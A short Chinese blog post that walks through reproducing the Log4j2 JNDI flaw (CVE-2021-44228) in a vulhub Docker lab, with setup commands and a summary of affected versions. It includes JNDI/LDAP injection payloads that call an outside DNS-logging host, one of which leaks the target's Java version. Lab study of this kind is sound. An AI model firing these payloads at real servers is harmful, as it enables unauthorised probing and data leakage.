注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!
理论知识
讲的都比较详细
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)_plexming的博客-CSDN博客_漏洞复现流程刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。https://blog.csdn.net/qq_46145027/article/details/124661480从0到1带你深入理解log4j2漏洞https://baijiahao.baidu.com/s?id=1720302213380803056&wfr=spider&for=pc
漏洞复现
一、在服务器上搭建log4j2环境
cd vulhub/log4j/CVE-2021-44228 进入目录里
docker-compose build 搭建log4j2
docker-compoes up -d 开启环境
docker-compoes ps 查看对应的端口
可以看到端口在8983上,我们到服务器防火墙打开8983
二、检查是否存在漏洞
payload action=${jndi:ldap://0tortx.dnslog.cn}
刷新发现有值,则存在漏洞 接着我们再构造payload action=${jndi:ldap://${sys:java.version}.0tortx.dnslog.cn} 出现
java版本,则存在命令执行漏洞
总结:
log4j2属于是Apache的一个java日志框架,log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:和ldap:是不安全的或者可以允许远程代码执行。影响版本: log4j2.x <= 2.14.1